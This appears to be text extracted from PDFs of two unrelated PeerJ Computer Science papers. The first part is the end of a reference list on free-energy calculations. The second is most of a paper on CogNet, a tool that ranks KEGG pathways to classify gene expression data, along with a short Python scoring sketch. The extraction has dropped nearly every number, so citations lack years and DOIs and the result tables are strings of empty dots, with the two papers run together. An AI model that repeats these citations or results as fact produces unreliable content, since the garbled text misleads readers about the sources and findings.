jorgensen wl, maxwell ds, tirado-rives j. . development and testing of the opls all-atom force field on conformational energetics and properties of or- ganic liquids. journal of the american chemical society ( ): – doi . /ja . kaus jw, arrar m, mccammon ja. . accelerated adaptive integration method. journal of physical chemistry b ( ): – doi . /jp y. kaus jw, mccammon ja. . enhanced ligand sampling for relative protein-ligand binding free energy calculations. journal of physical chemistry b ( ): – doi . /acs.jpcb. b . mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /jcc. http://dx.doi.org/ . /j.sbi. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /acs.jcim. b http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /jcc. http://dx.doi.org/ . /wcms. http://dx.doi.org/ . /pac http://dx.doi.org/ . /j.ejpb. . . http://dx.doi.org/ . /ja http://dx.doi.org/ . /jp y http://dx.doi.org/ . /acs.jpcb. b http://dx.doi.org/ . /peerj-cs. klimovich pv, shirts mr, mobley dl. . guidelines for the analysis of free energy calculations. journal of computer-aided molecular design : – doi . /s - - - . knight jl, brooks cl. . λ—dynamics free energy simulation methods. journal of computational chemistry ( ): – doi . /jcc. . knight jl, brooks cl. . multisite λ dynamics for simulated structure—activity relationship studies. journal of chemical theory and computation ( ): – doi . /ct f. kofke da. . free energy methods in molecular simulation. fluid phase equilibria – : – doi . /j.fluid. . . . kong x, brooks cl. . —dynamics: a new approach to free energy calculations. the journal of chemical physics ( ): – doi . / . . lyubartsev ap, førrisdahl ok, laaksonen a. . calculations of solvation free energies by expanded ensemble method. in: nd international conference on natural gas hydrates. toulouse (france), june – , , ( ). – . mackerell ad, banavali n, foloppe n. . development and current status of the charmm force field for nucleic acids. biopolymers (nucleic acid sciences : – . miller cr, johnson el, burke az, martin kp, miura ta, wichman ha, brown cj, ytreberg fm. . initiating a watch list for ebola virus antibody escape mutations. peerj :e doi . /peerj. . miller cr, lee kh, wichman ha, ytreberg fm. . changing folding and binding stability in a viral coat protein: a comparison between substitutions accessible through mutation and those fixed by natural selection. plos one ( ):e doi . /journal.pone. . mobley dl, liu s, cerutti ds, swope wc, rice je. . alchemical prediction of hydration free energies for sampl. journal of computer-aided molecular design ( ): – doi . /s - - - . paliwal h, shirts mr. . a benchmark test set for alchemical free energy transfor- mations and its use to quantify error in common free energy methods. journal of chemical theory and computation ( ): – doi . /ct . petukh m, li m, alexov e. . predicting binding free energy change caused by point mutations with knowledge-modified mm/pbsa method. plos computational biology ( ): – doi . /journal.pcbi. . salomon-ferrer r, case da, walker rc. . an overview of the amber biomolecular simulation package. wiley interdisciplinary reviews: computational molecular science ( ): – doi . /wcms. . shirts mr, chodera jd. . statistically optimal analysis of samples from multiple equilibrium states. journal of chemical physics ( ): - – - doi . / . . shirts mr, mobley dl. . an introduction to best practices in free energy cal- culations. in: monticelli l, salonen e, eds. 
biomolecular simulations. methods mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jcc. http://dx.doi.org/ . /ct f http://dx.doi.org/ . /j.fluid. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ct http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /wcms. http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. in molecular biology (methods and protocols), vol. . totowa: humana press, – doi . / - - - - . shirts mr, mobley dl, chodera jd. . chapter alchemical free energy calculations: ready for prime time? annual reports in computational chemistry (february ): – doi . /s - ( ) - . shirts mr, pande vs. . comparison of efficiency and bias of free energies com- puted by exponential averaging, the bennett acceptance ratio, and thermody- namic integration. journal of chemical physics ( ): - – - doi . / . . shirts mr, pitera jw, swope wc, pande vs. . extremely precise free energy calculations of amino acid side chain analogs: comparison of common molecular mechanics force fields for proteins. journal of chemical physics ( ): – doi . / . . shyu c, ytreberg fm. . reducing the bias and uncertainty of free energy estimates by using regression to fit thermodynamic integration data. journal of computational chemistry ( ): – doi . /jcc. . Śledź p, caflisch a. . protein structure-based drug design: from docking to molecular dynamics. current opinion in structural biology : – doi . /j.sbi. . . . steinbrecher t, labahn a. . towards accurate free energy calculations in ligand protein-binding studies. current medicinal chemistry ( ): – doi . / . sun y, spellmeyer d, pearlman da, kollman p. . simulation of the solvation free energies for methane, ethane, and propane and corresponding amino acid dipeptides: a critical test of the bond-pmf correction, a new set of hydrocarbon parameters, and the gas phase-water hydrophobicity scale. journal of the american chemical society ( ): – doi . /ja a . ytreberg fm, swendsen rh, zuckerman dm. . comparison of free energy methods for molecular systems. journal of chemical physics ( ): – doi . / . . zhan ya, wu h, powell at, daughdrill gw, ytreberg fm. . impact of the k n mutation on the transactivation domain of p and its binding to murine double- minute clone . proteins: structure, function and bioinformatics ( ): – doi . /prot. . zhan ya, ytreberg fm. . the cis conformation of proline leads to weaker binding of a p peptide to mdm compared to trans. archives of biochemistry and biophysics : – doi . /j.abb. . . . zhang h, liao l, saravanan km, yin p, wei y. . deepbindrg: a deep learning based method for estimating effective protein—ligand affinity. peerj :e doi . /peerj. . zwanzig rw. . high-temperature equation of state by a perturbation method. i. nonpolar gases. journal of chemical physics ( ): – doi . / . . mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /jcc. http://dx.doi.org/ . /j.sbi. . . http://dx.doi.org/ . / http://dx.doi.org/ . /ja a http://dx.doi.org/ . / . http://dx.doi.org/ . /prot. http://dx.doi.org/ . /j.abb. . . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. 
cognet: classification of gene expression data based on ranked active-subnetwork-oriented kegg pathway enrichment analysis cognet: classification of gene expression data based on ranked active-subnetwork- oriented kegg pathway enrichment analysis malik yousef , , ege Ülgen and osman uğur sezerman galilee digital health research center (gdh), zefat academic college, zefat, israel department of information systems, zefat academic college, zefat, israel department of biostatistics and medical informatics, school of medicine, acibadem mehmet ali aydinlar university, istanbul, turkey abstract most of the traditional gene selection approaches are borrowed from other fields such as statistics and computer science, however, they do not prioritize biologically relevant genes since the ultimate goal is to determine features that optimize model performance metrics not to build a biologically meaningful model. therefore, there is an imminent need for new computational tools that integrate the biological knowledge about the data in the process of gene selection and machine learning. integrative gene selection enables incorporation of biological domain knowledge from external biological resources. in this study, we propose a new computational approach named cognet that is an integrative gene selection tool that exploits biological knowledge for grouping the genes for the computational modeling tasks of ranking and classification. in cognet, the pathfindr serves as the biological grouping tool to allow the main algorithm to rank active-subnetwork-oriented kegg pathway enrichment analysis results to build a biologically relevant model. cognet provides a list of significant kegg pathways that can classify the data with a very high accuracy. the list also provides the genes belonging to these pathways that are differentially expressed that are used as features in the classification problem. the list facilitates deep analysis and better interpretability of the role of kegg pathways in classification of the data thus better establishing the biological relevance of these differentially expressed genes. even though the main aim of our study is not to improve the accuracy of any existing tool, the performance of the cognet outperforms a similar approach called mate while obtaining similar performance compared to other similar tools including svm-rce. cognet was tested on gene expression datasets concerning a variety of diseases. subjects bioinformatics, data science keywords classification, gene expression, enrichment analysis, kegg pathway, rank, machine learning, bioinformatics, data science, data mining, genomics introduction due to recent advances in dna gene expression technology, it is now feasible to obtain gene expression profiles of tissue samples at relatively low costs. data from genome-wide gene expression analyses are helping scientists and physicians understand the disease how to cite this article yousef m, Ülgen e, uğur sezerman o. . cognet: classification of gene expression data based on ranked active- subnetwork-oriented kegg pathway enrichment analysis. peerj comput. sci. :e doi . /peerj-cs. submitted september accepted november published february corresponding author malik yousef, malik.yousef@zefat.ac.il academic editor faizal khan additional information and declarations can be found on page doi . /peerj-cs. copyright yousef et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. 
mailto:malik.�yousef@�zefat.�ac.�il https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ mechanisms and use that information to design platforms to assist in diagnosis, to assess prognosis, and to inform treatment plans. for instance, a study by van ’t veer et al. ( ) collected gene expression data on primary breast tumors of young patients. machine learning with feature selection was used to identify a gene expression signature strongly predictive of a short interval to distant metastases (“poor prognosis” signature), even in patients that were lymph node negative. gene expression technologies are now producing large datasets associated with a variety of diseases. due to the high dimensionality of the data and relatively small sample sizes, reliable interpretation of the data is a complicated and often overwhelming, and this is an important problem in bioinformatics research. although sample sizes have continued to grow in recent years, new and efficient feature selection algorithms are still needed to overcome challenges in the existing methods (vanjimalar, ramyachitra & manikandan, ), in order to achieve the full potential of this data in the development of gene-based diagnostic tests, drug discovery and therapeutic strategies for improving public health. most of the traditional gene selection approaches are borrowed from other fields such as statistics and computer science. there is a need for new computational tools that integrate the biological knowledge about the data in the process of gene selection and classification. integrative gene selection incorporates biological domain knowledge to selection processes from external biological resources. the main aim of integrative gene selection is to generate a ranked list of features that provides high model performance and takes into consideration both statistical metrics applied on the gene expression data and the biological background information provided as external datasets. for example, biological background information may be gene ontology (go) where it provides for each gene its product as cellular components (cc), molecular functions (mf), and biological processes (bp). go is a way to capture biological knowledge in a computable form that consists from a set of concepts and their relationships with each other. the various methods that have been applied to the process of selecting disease-specific features from large gene expression datasets were reviewed recently (pan, ; lazar et al., ) and fall into three major categories: “filters”, “wrappers”, and “embedded approaches”. briefly, the filter approach, not based on any machine learning algorithm, uses a statistic (anova, t-test, etc.), wrappers use learning techniques to evaluate which features are useful, and embedded techniques combine the feature selection step and classifier construction. pan ( ) recently compared different filtering methods, highlighting similarities and differences between three main methods: the t-test, a regression modeling approach, and a mixture model approach. additional comparisons of filtering techniques are available in lazar et al. ( ). inza et al. ( ) also carried out a comparison between a filter metrics and a wrapper sequential search procedure applied on gene expression datasets. 
integrative approaches become important topics (bellazzi & zupan, ; fang, mustapha & sulaiman, ) in the emerging field of gene expression. go (ashburner et al., ) was used by qi & tang ( ) for genes ranking based on not only their individual discriminative powers but also the powers of biological information contained yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in go annotations. the algorithm is an iterative algorithm that starts by applying information gain (ig) to compute discriminative scores for each gene. genes with a score of zero are removed from the analysis. the second step is to integrate the biological knowledge by annotating those surviving genes with go term. the third step is to score the go terms as the mean of its associated gene ig score. move the gene with the highest ig from the go term with the highest score, to the final list. this procedure is repeated until the final goal is reached. sofocles (papachristoudis, diplaris & mitkas, ) is an interactive tool that enables semantic feature filtering in microarray classification problems with the use of external biological knowledge retrieved from the gene ontology. sofocles involves the calculation of semantic similarities between two feature sets in order to derive an enriched, semantically-aware final feature set. the go terms are used in order to give a similarity score for each annotated gene. fang, mustapha & sulaiman ( ) proposed an integrative gene selection based on filter method and association analysis for selecting genes that are not only differentially expressed but also informative for classification. association analysis was employed to integrate microarray data with gene ontology (go) and kegg pathways (kegg) simultaneously. the performance of the integrative models verified the efficiency and scalability of association analysis in mining microarray data. an additional study that integrated kegg with genetic meta information (disgenet (piñero et al., )) was proposed by raghu et al. ( ). their approach was a two-step analytical workflow that incorporates a new feature selection paradigm as the first step and that utilizes graphical causal modeling as the second step to handle the automatic extraction of causal relationships. quanz, park & huan ( ) apply the method of pathways-as-features using the kegg pathway database for the pathway extraction component and global test method for the pathway selection component. the genes in each pathway are then transformed into one single feature by mean normalization or logistic regression. the number of features of the transformed data is the number of pathways. for instance, for the diabetes data for which pathways are selected, the dimensionality is reduced from , to for the classification task. unsupervised gene selection using biological knowledge-based go terms was suggested by acharya, saha & nikhil ( ). they have utilized gene annotation data, where each gene is represented as a structural information content (ic) based gene-go term annotation vector which intuitively forms a gene-go term annotation matrix for a selected data set. ic is the information content of a go term is related to how often the term is applied to genes in the database. a very interesting study that emphasizes the need for an integrative approach was conducted by perscheid, grasnick & uflacker ( ). their work compared the performance of traditional and integrative gene selection approaches. 
moreover, they propose a straightforward approach to integrate external knowledge with traditional gene selection approaches. the framework enables automatic external knowledge yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ integration, gene selection, and evaluation. the study shows that the integration of external knowledge improves overall analysis results. feature selection and discovering the molecular explanation of disease describe the same process, where the first one is a computer science term and the second one is used in the biomedical sciences. several tools are now available that allow users to break the fixed set paradigm in assessing the statistical enrichment of sets of genes. in this regard, the gene set enrichment analysis is a very important method. recently, different approaches were developed and become useful tools in gene expression analysis (cohn-alperovich et al., ; ulgen, ozisik & sezerman, ). pathfindr (ulgen, ozisik & sezerman, ) is a tool for pathway enrichment analysis utilizing active subnetworks (an active subnetwork can be defined as a group of interconnected genes in a protein-protein interaction network (pin) that predominantly consists of significantly altered genes). it identifies gene sets that form active subnetworks in a protein-protein interaction network using a list of genes provided by the user. it then performs pathway enrichment analyses on the identified gene sets. in most enrichment approaches, relational information captured in the graph structure of a pin is overlooked as genes in the network neighborhood of significant genes are not taken into account. the approach pathfindr uses for exploiting interaction information to enhance pathway enrichment analysis is active subnetwork search. briefly, active subnetwork search enables inclusion of genes that are not significant genes themselves but connect significant genes. this results in the identification of phenotype- associated connected significant subnetworks. initially identifying active subnetworks in a list of significant genes and then performing pathway enrichment analysis of these active subnetworks efficiently, pathfindr exploits interaction information between the genes. this, in turn, helps pathfindr uncover relevant mechanisms underlying the disease. support vector machines-recursive cluster elimination (svm-rce) is a machine learning algorithm based on grouping/clustering gene expressions for scoring each cluster of genes (yousef et al., ). interest in this approach has grown over time and a number of publications based on svm-rce that have successfully applied this approach to identifying those features directly associated with a disease/condition are being published. this increasing interest is based on a reconsideration of how feature selection in biological datasets can benefit from considering the biomedical relationships of the features in the selection process. the usefulness of svm-rce then led to the development of additional computational tools. similar studies for svm-rce were carried out (harris & niekerk, ; lazzarini & bacardit, ) indicating the importance of the merit of svm-rce approach. the study of deshpande et al. ( ) is a derivative of svm-rce algorithm with small modification for disease state prediction. additionally, they have used our invented term “recursive cluster elimination”. 
most interestingly, the study of zhao, wang & chen ( ) has used the svm-rce tool for comparison tasks applied for detection on expression profiles for identifying micrornas related to venous metastasis in hepatocellular carcinoma. svm-rne (yousef et al., ) is a similar approach to svm-rce, and uses the gxna (nacu et al., ) tool to extract the genes networks from the gene expression data. yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ those networks serve as groups/clusters of genes that are subject to the rank procedure. a similar study to svm-rne was carried out by johannes et al. ( ) for the integration of pathway knowledge into a reweighted recursive feature elimination approach for risk stratification of cancer patients. the term knowledge-driven variable selection (kdvs) is a similar term of integration of biological knowledge in the process of feature selection. in zycinski et al. ( ), the authors proposed a kdvs framework, which uses a priori biological knowledge in highthroughput data analysis, and applied this framework to svm-rne. the most recent tool that integrates biological knowledge for grouping the genes was mate (yousef, abdallah & allmer, ), which uses the same approach based on the interactions of micrornas (mirna) and their gene targets. the mate approach is different from svm-rce and svm-rne in that it integrates additional input to the algorithm which is the information about mirna and its target set. the benefit of integration of biological knowledge led us to suggest a new tool called cognet, that integrates biological knowledge derived from integrating the pathfindr tool into an integrative approach. in cognet, the pathfindr tool serves as the biological grouping function allowing the main algorithm to rank active-subnetwork-oriented kegg pathway enrichment analysis results. the details of the tool will be described in the following sections. materials and methods the computational tool cognet that we developed is based on the concept of integration of biological knowledge with machine learning in order to perform two tasks: the first task is ranking the groups of genes (in this case, pathway genes) and then use the top groups (significant groups) to build a machine learning model. figure displays the general figure general workflow for integrating biological information for grouping the genes by biof() function. biof() could be microrna targets association, kegg pathway association or other association. full-size doi: . /peerj-cs. /fig- yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ workflow of integrating biological information for grouping the genes by a biological grouping functions. the cognet components meet the general approach of the integration of biological knowledge with machine learning as described in fig. . in fact, the tools svm-rce, svm-rne, and mate also fit the general approach described in fig. . let us assume that we are given a two-class data d, which consists of k samples and n genes. let us assume that the biological grouping function groups the n genes into m groups as following: biof(g ,g ,…,gn) = {grp ,grp ,…,grpm}. biof() can also assign some genes to a specific group that contains genes about which there is no biological knowledge. 
the biof() function is used in order to group/cluster the genes using biological information that could be associated with a specific biological concept. for example, biof() could group genes according to their mirna targets (as the tool mate did), or might be according to disease, meaning that groups of genes are associated with specific diseases. the ranking step is based on the machine learning algorithm used. in order to estimate the significance of each group grpi of genes, the following algorithm is applied: . create a new data d� that contains only genes from the grpi. . apply cross validation using the ml algorithm. . assign a score to grpi. the score is the average of the performance metric (could be accuracy, the area under the curve, f-measure, etc.) pathfindr in this section, we describe the pathfindr tool that serves as the biof() function (fig. ) in the cognet tool. active-subnetwork-oriented kegg pathway enrichment analysis of the proteins was conducted using the r package pathfindr (ulgen, ozisik & sezerman, ). active subnetworks are subnetworks within the pin (biogrid, by default) that have a locally maximal score (based on the provided significance values). active subnetworks define distinct disease-associated sets of interacting genes, whether discovered through the original analysis or discovered because of being in interaction with a significant gene. the workflow of pathfindr is presented in fig. . after processing the input (to filter the differential expression results, the p value threshold was chosen as . ), pathfindr maps the input genes onto a pin. using the mapped genes, an active subnetwork search (with the greedy approach as default) is performed. the resulting active subnetworks are then filtered based on their scores and the number of significant genes they contain. this filtered list of active subnetworks is then used for enrichment analyses (over- representation analysis via hypergeometric-distribution-based tests), that is, using the genes in each of the active subnetworks, the significantly enriched pathways are identified. enriched pathways with adjusted p values larger than the given threshold ( . was used) are discarded and the lowest adjusted p-value (overall active subnetworks) for each term is kept. this process of “active subnetwork search + enrichment analyses” is repeated for a selected number of iterations (default is ), performed in parallel. over all iterations, the lowest and the highest adjusted-p values, as well as the number of occurrences over all iterations are reported for each significantly enriched pathway. yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the cognet tool the cognet algorithm is based on the general approach of integrating biological information for grouping the genes as described in fig. . overall, the tool is composed of two components. the first component is the pathfindr step that is serving to generate the groups of genes, which are enriched kegg pathways. then, the second component is applied to rank those groups in terms of their contribution to separate the two-class data d. the workflow of the tool is presented in fig. . the cognet starts by splitting the data into two parts. the first part is the training part that is used in order to rank the pathways produced by the tool pathfindr. the test part is utilized at the end of the algorithm in order to estimate the performance of the cognet. 
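as a concrete illustration of the group scoring just described, the sketch below restricts the expression matrix to one group of genes at a time and averages a classification metric over repeated random train/test splits. the classifier (random forest), the metric (accuracy), the number of repetitions and the helper names score_group and rank_groups are assumptions made for the example; the actual cognet implementation is the knime workflow described later in this section.

```python
# illustrative sketch of the group-scoring step: each gene group produced by the
# biological grouping function biof() is scored by repeated train/test splits using
# only its own genes. classifier, metric and split fraction are assumed choices.
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score

def score_group(expr: pd.DataFrame, labels: pd.Series, genes, n_rep=10, test_size=0.1, seed=0):
    """mean accuracy over repeated random splits, using only the genes of one group."""
    cols = [g for g in genes if g in expr.columns]   # ignore genes absent from the data
    if not cols:
        return np.nan
    accs = []
    for r in range(n_rep):
        x_tr, x_te, y_tr, y_te = train_test_split(
            expr[cols], labels, test_size=test_size, stratify=labels, random_state=seed + r)
        clf = RandomForestClassifier(n_estimators=200, random_state=seed + r).fit(x_tr, y_tr)
        accs.append(accuracy_score(y_te, clf.predict(x_te)))
    return float(np.mean(accs))

def rank_groups(expr, labels, groups):
    """groups: dict mapping a group id (e.g. a kegg pathway id) to a list of gene names."""
    scores = {gid: score_group(expr, labels, genes) for gid, genes in groups.items()}
    return sorted(scores.items(), key=lambda kv: kv[1], reverse=True)
```

the same scoring routine applies regardless of which biological grouping function produced the groups, which is what allows kegg pathways, mirna target sets or disease gene sets to be ranked interchangeably.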
a list of genes and their p-values represented in a table is created to serve as input to pathfindr (table ). the list is computed using student’s t-test to assign for each gene its differential expression significance (p-value). the pathfindr tool is invoked to create n figure flow diagram of the pathfindr active-subnetwork-oriented enrichment analysis approach. image credit: coort s, hanspers k, waagmeester a, defay a et al. (https://www.wikipathways.org/index. php/pathway:wp ), cc . universal (cc . ). full-size doi: . /peerj-cs. /fig- figure cognet workflow. full-size doi: . /peerj-cs. /fig- yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.wikipathways.org/index.php/pathway:wp https://www.wikipathways.org/index.php/pathway:wp http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ significant kegg pathways, from now on, we refer to this as n groups of genes grp ,grp ,…, grpn. as a preprocess to the step of the ranking, each kegg pathway is producing one data set out of the final data d that containing only genes of the specific pathway. thus, n datasets d�i i = , ,…n, (with |grpi| as the number of genes) are created to be subject for the rank step. table presents an example input table to rank step. the rank step is computed as a monte carlo cross-validation (mccv), where for each d�i a score is assigned as the mean of computing accuracy of r iteration of splitting the data into two parts one for training and second for testing (for example, % training and % testing) applying random forest (or another ml algorithm such as svm). the output of the stage is a sorted list of kegg pathways according to the score assigned in the rank step. let refer to this list as grp� , grp� , …, grp�n. table presents an example of the output of rank step. the final step is to compute the performance of the cognet by training the rf on top pathways and test on the main test data (from the first stage of the algorithm). � gene_list={} � for i = to n: a. gene_list = gene_list ∪ grp�n b. create tr to be the data dtrain with just genes belongs to gene_list. table example of input table to the tool pathfindr. gene p-value scarna . cacna d . ip k . mir . dlx . snord . sgcg . tcf . rps . note: the table consist from list of genes and its p-values. table example of input table to the rank step. id p-value pathway genes hsa . e− fzd , thbs , col a , col a , tnc, itga , ptk , ppp ca, ccnd , ikbkb, atp v g , atp v a , jag , maml hsa . e− fgf , igf , flt lg, angpt , col a , col a , thbs , tnc, itga , ptk , lpar , gnb , mlst , rps , ppp ca, ccnd , ikbkb hsa . e− ccl , adcy , adcy , ikbkb, rock , gnb , ptk , prkcb, grk hsa . e− rps , rps , rps , rps , rpl -c orf , rpl , rpl l , rpl hsa . e− ptk , prkcb, gnb , ikbkb, ccnb note: the list consists from three columns, id is the kegg pathway id, p-value is the p-value of the pathways computed by pathfidr while the last column is the list of genes belonging to the kegg pathway. yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ c. train rf on tr and create an rf model. d. create tst to be the data dtest with just genes belongs to gene_list. e. res{i} = performance of applying rf model on tst. one of the outputs of the cognet is a table that reports the performance on top , ,…, n. however, we have created a table only for the top . 
we should state that n is a variable and is dependent on the data. sometimes, n may not reach because pathfindr reports only the significant kegg pathways. in the worst case, the output of pathfindr could be an empty list. another output is the significant list of kegg pathways and also the significant genes. we run the cognet algorithm multiple times (k times) where each time the data is split into % for training and % for testing. the cognet keeps track of each kegg pathway and the number of times appears on top of the list. additionally, cognet keeps track of the genes that belong to the pathway and how many times they were on the top. an example of input of top pathways and genes produced by cognet is presented in table . implementation we have decided to use the free and open-source platform knime (berthold et al., ) due to its simplicity and very useful graphical representations. additionally, knime is a highly integrative tool. a script for performing analysis with pathfindr was imported as an r node to the knime workflow. the knime workflow consists mainly of nodes where each node has its own functionality. meta- node is created as a collection of nodes that has a specific task to perform. the workflow multi-file cognet is presented in fig. . it starts by uploading a list of the names of the datasets (url) by the “list files node”. then a loop over those datasets to read each data by the node “table reader” and send it as input to the cognet tool (cognet meta-node). while fig. presents the flowchart of cognet algorithm, fig. presents the implementation of cognet as a knime workflow with its meta-nodes. the input has two ports, where the first port is for the test data, the second port is for the training data. the training data is passed to the tool pathfindr (one of the meta-nodes) to process the data and get as an output a sorted table of significant pathways. the “rankpathways” meta nodes perform the task of the ranking, while the flow between “counting loop start” and “loop end” is for performing testing on top i pathways. it ranges from to . additional task for the node “loop end” is to collect all the results and send them out to be processed and save the results. gene expression data a total of human gene expression datasets were downloaded from the gene expression omnibus (clough & barrett, ) at ncbi. for all datasets disease (positive) and control yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (negative) data were available (table ). those datasets served to test the cognet and for comparison with other two tools mate and svm-rce. model performance evaluation for each established model, we calculated a number of statistical measures like sensitivity, specificity, and accuracy to evaluate model performance. the following formulations were table example output of rank step. id acc sen spe rec prec fm hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . note: the values are the mean of each performance metric appearing on the column title. acc, accuracy; sen, sensitivity; spe, specificity; rec, recall; prec, precession; fm, f-measure. table example of output of top pathways and top genes. 
kegg pathway count genes hsa brip, rmi ,ube t hsa creb l ,gnb ,hist h ak,hist h bc,hist h bj,hist h h, hist h aa ,ppp r b hsa col a ,hist h ak,hist h bc,hist h bj,hist h h,hist h aa hsa col a ,prlr figure multi-file cognet workflow applied to multiple datasets. used to calculate the statistics (with tp: true positive, fp: false positive, tn: true negative and fn: false negative classifications): sensitivity (se, recall) = tp/(tp + fn); specificity (sp) = tn/(tn + fp); accuracy (acc) = (tp + tn)/(tp + tn + fp + fn). additionally, the area under the receiver operating characteristic (roc) curve (auc) (bradley, ) is an estimate of the probability that a classifier will rank a randomly chosen positive instance higher than a randomly chosen negative instance. all reported performance measures refer to the average of -fold mccv. some of the data sets used by the classifier are imbalanced, which can bias the classifier towards the class with more samples. this is known as the problem of imbalanced class distribution. we have applied an under-sampling approach that reduces the number of samples of the majority class to that of the minority class, thus reducing the bias in the size distribution of the data subsets. we chose to apply under-sampling with a ratio of : . availability and implementation the knime workflow implementing cognet is available at https://malikyousef.com -> bioinformatics tools and on github at https://github.com/malikyousef/mircorrnet. the doi of the tool is https://doi.org/ . /zenodo. . results we have considered gene expression data sets to test cognet and to compare it with other similar tools. to our knowledge, no tools similar to cognet exist. nonetheless, we compare cognet with tools that have a similar merit of grouping and ranking, mate and svm-rce. although the purpose of the comparison is not to prove a higher performance, cognet outperforms mate and achieves performance similar to svm-rce, with the advantage of using a much smaller number of genes than svm-rce. figure the main workflow (as meta-nodes) for cognet. additionally, we have run cognet in two versions, where cognet_svm uses svm for the scoring and classification while cognet_rf uses random forest (rf) for scoring and classification. the results for cognet_svm are provided in the supplemental data. table description of the data sets used in our study. the data sets are obtained from geo. each entry gives the geo code, the name of the data set, the number of samples and the classes of the data.
geo accession title sample count classes gds glioma-derived stem cell factor effect on angiogenesis in the brain pos = neg = non-tumor = (neg) astrocytomas = (pos) glioblastomas = (pos) gds early-stage parkinson’s disease: whole blood pos = neg = healthy control = (neg) neurodegenerative disease control = (neg) parkinson disease = (pos) gds colon epithelial biopsies of ulcerative colitis patients pos = neg = normal = ulcerative colitis = gds metastatic prostate cancer (hg-u c) pos = neg = normal = tumor = gds pulmonary hypertensions: pbmcs pos = neg = control = (neg) idiopathic pulmonary arterial hypertension = (pos) scleroderma-associated pulm. arterial hypert. = (pos) systemic sclerosis (ssc) without pulm. hypert. = (pos) ssc, interstitial lung disease & pulm. hypert. = (pos) gds celiac disease: primary leukocytes pos = neg = healthy control = celiac disease = gds diabetic children: peripheral blood mononuclear cells (u a) neg = pos = healthy = type , diabetes = gds non-small cell lung carcinoma in female nonsmokers pos = neg = lung cancer = control = gds severe asthma: bronchial epithelial cell pos = neg = mild asthma = control = severe asthma = gds _ colorectal cancer: laser microdissected tumor tissues colorectal cancer: homogenized tumor tissues pos = neg = laser microdissected tumor tissues = homogenized tumor tissues = gse (gds ) colonic mucosa pos = neg = colonic mucosa of healthy control = colonic mucosa patients = gse (gds ) rheumatoid arthritis (ra) patients pos = neg = rheumatoid arthritis (ra) control gse (gds ) prostate cancer analysis of malignant and benign prostate tissues pos = neg = prostate cancer = normal = yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table (a–c) a summary result table presenting the auc of each tool over data sets. #clusters/#groups are related to the number of clusters for svm-rce and groups for mate and cognet. auc is average of for the performance of area under curve while #g is the average number of genes for each level. #clusters/ #groups svm-rce gds gds gds gds gds gds gds gds _ gds gds gds gds gds auc auc auc auc auc auc auc auc auc auc auc auc auc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 